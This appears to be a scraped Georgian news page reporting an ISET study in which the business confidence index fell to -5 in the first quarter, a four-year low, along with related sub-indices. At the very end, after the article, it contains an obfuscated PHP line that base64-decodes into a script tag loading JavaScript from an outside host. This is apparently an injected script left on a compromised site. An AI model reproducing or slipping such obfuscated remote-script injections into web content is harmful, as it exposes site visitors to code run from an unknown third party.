tube
ავერსი jaluzi

ბიზნესის განწყობის ინდექსი ოთხწლიან მინიმუმზეა, - ამის შესახებ აღნიშნულია ISET-ის კვლევაში.

ანგარიშის თანახმად, მიმდინარე წლის პირველ კვარტალში ბიზნესის განწყობის ინდექსი 8.8 პუნქტით დაეცა და -5-ს გაუტოლდა, რაც ბოლო ოთხი წლის განმავლობაში ყველაზე დაბალი ნიშნულია.

ამასთან, მათივე შეფასებით, რეკორდულად დაბალ დონეზეა მოლოდინების და მიმდინარე მდგომარეობის ინდექსებიც, რაც ბიზნეს-სექტორის პესიმისტურ მოლოდინებსა და უარყოფით მიმდინარე შედეგებს ასახავს.

„მიმდინარე მდგომარეობის ინდექსი 22.4 პუნქტით შემცირდა და -18.6-ს გაუტოლდა, მოლოდინების ინდექსი კი 16.9 პუნქტით შემცირდა და -9.9 შეადგინა.

გასაყიდი ფასების მოლოდინების ინდექსი 6.9-ით გაიზარდა და 20 პუნქტი შეადგინა.

ეს მაჩვენებლები გვიჩვენებს, რომ ბიზნესების წილი, რომლებიც მომდევნო სამ თვეში ვარაუდობენ ფასები მატებას საკუთარ პროდუქტზე გაიზარდა,“ - ვკითხულობთ ISET-ის კვლევაში.

82
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");